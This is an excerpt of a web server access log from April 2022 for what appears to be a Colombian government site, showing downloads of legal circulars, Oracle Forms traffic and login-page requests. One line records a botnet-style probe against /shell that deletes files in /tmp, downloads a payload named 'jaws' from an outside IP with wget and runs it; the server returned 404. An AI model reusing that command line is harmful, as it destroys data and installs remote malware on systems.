172.22.2.4 - - [16/Apr/2022:15:45:23 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%209%20del%2003%20de%20Noviembre%20de%202011.pdf HTTP/1.1" 200 54568
172.22.2.4 - - [16/Apr/2022:15:45:29 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%208%20del%2020%20de%20Septiembre%20de%202011.pdf HTTP/1.1" 200 285158
172.22.2.4 - - [16/Apr/2022:15:45:38 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%207%20del%2023%20de%20Diciembre%20de%202011.pdf HTTP/1.1" 200 1107785
172.22.2.4 - - [16/Apr/2022:15:45:46 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%207%20del%2015%20de%20Septiembre%20de%202011.pdf HTTP/1.1" 200 314873
172.22.2.4 - - [16/Apr/2022:15:45:52 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%206%20del%2029%20de%20Julio%20de%202011.pdf HTTP/1.1" 200 262144
191.156.145.182 - - [16/Apr/2022:15:46:01 -0500] "GET /si-eres-mujer-y-te-gusta-el-cuidado-de-los-humedales-este-proceso-de-formacion-es-para-ti.html HTTP/1.1" 200 1025
200.118.64.109 - - [16/Apr/2022:15:46:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6eea748ea1fca4a5a88a1d59c29c86a66.e3iSbxaKaheRe3iOaNeTahmObO1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [16/Apr/2022:15:46:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6eea748ea1fca4a5a88a1d59c29c86a66.e3iSbxaKaheRe3iOaNeTahmObO1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [16/Apr/2022:15:46:06 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6eea748ea1fca4a5a88a1d59c29c86a66.e3iSbxaKaheRe3iOaNeTahmObO1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [16/Apr/2022:15:46:07 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6eea748ea1fca4a5a88a1d59c29c86a66.e3iSbxaKaheRe3iOaNeTahmObO1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [16/Apr/2022:15:46:08 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6eea748ea1fca4a5a88a1d59c29c86a66.e3iSbxaKaheRe3iOaNeTahmObO1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [16/Apr/2022:15:46:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6eea748ea1fca4a5a88a1d59c29c86a66.e3iSbxaKaheRe3iOaNeTahmObO1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 109
200.118.64.109 - - [16/Apr/2022:15:46:11 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6eea748ea1fca4a5a88a1d59c29c86a66.e3iSbxaKaheRe3iOaNeTahmObO1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [16/Apr/2022:15:46:11 -0500] "GET /reports/rwservlet/getjobid75101?server=repnomi HTTP/1.1" 200 499035
200.118.64.109 - - [16/Apr/2022:15:46:25 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6eea748ea1fca4a5a88a1d59c29c86a66.e3iSbxaKaheRe3iOaNeTahmObO1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [16/Apr/2022:15:46:29 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%206%20del%2023%20de%20Septiembre%20de%202011.pdf HTTP/1.1" 200 252800
172.22.2.4 - - [16/Apr/2022:15:46:35 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%205%20del%2014%20de%20Julio%20de%202011.pdf HTTP/1.1" 200 1488992
172.22.2.4 - - [16/Apr/2022:15:46:42 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%205%20del%2012%20de%20Agosto%20de%202011.pdf HTTP/1.1" 200 431796
66.249.65.13 - - [16/Apr/2022:15:46:46 -0500] "-" 408 -
172.22.2.4 - - [16/Apr/2022:15:46:49 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%204%20del%2014%20de%20Julio%20de%202011.pdf HTTP/1.1" 200 399895
172.22.2.4 - - [16/Apr/2022:15:46:56 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%204%20del%2012%20de%20Agosto%20de%202011.pdf HTTP/1.1" 200 601047
207.46.13.115 - - [16/Apr/2022:15:47:48 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2019%2F HTTP/1.1" 200 342653
40.77.167.46 - - [16/Apr/2022:15:48:14 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2022%2F HTTP/1.1" 200 12413
216.245.221.92 - - [16/Apr/2022:15:48:19 -0500] "HEAD / HTTP/1.1" 200 -
200.118.64.109 - - [16/Apr/2022:15:48:25 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6eea748ea1fca4a5a88a1d59c29c86a66.e3iSbxaKaheRe3iOaNeTahmObO1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
41.234.127.231 - - [16/Apr/2022:15:48:49 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+23.94.50.159/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
172.22.2.4 - - [16/Apr/2022:15:47:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58006
172.22.2.4 - - [16/Apr/2022:15:47:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58006
200.118.64.109 - - [16/Apr/2022:15:50:25 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6eea748ea1fca4a5a88a1d59c29c86a66.e3iSbxaKaheRe3iOaNeTahmObO1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [16/Apr/2022:15:48:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [16/Apr/2022:15:49:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60932
200.118.64.109 - - [16/Apr/2022:15:52:25 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6eea748ea1fca4a5a88a1d59c29c86a66.e3iSbxaKaheRe3iOaNeTahmObO1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
186.80.52.45 - - [16/Apr/2022:15:53:00 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
186.80.52.45 - - [16/Apr/2022:15:53:01 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.80.52.45 - - [16/Apr/2022:15:53:01 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12171
186.80.52.45 - - [16/Apr/2022:15:53:01 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 304 -
186.80.52.45 - - [16/Apr/2022:15:53:01 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 304 -
186.80.52.45 - - [16/Apr/2022:15:53:01 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 304 -
186.80.52.45 - - [16/Apr/2022:15:53:01 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 304 -
186.80.52.45 - - [16/Apr/2022:15:53:01 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.80.52.45 - - [16/Apr/2022:15:53:01 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.45 - - [16/Apr/2022:15:53:01 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.45 - - [16/Apr/2022:15:53:01 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.45 - - [16/Apr/2022:15:53:01 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.45 - - [16/Apr/2022:15:53:01 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
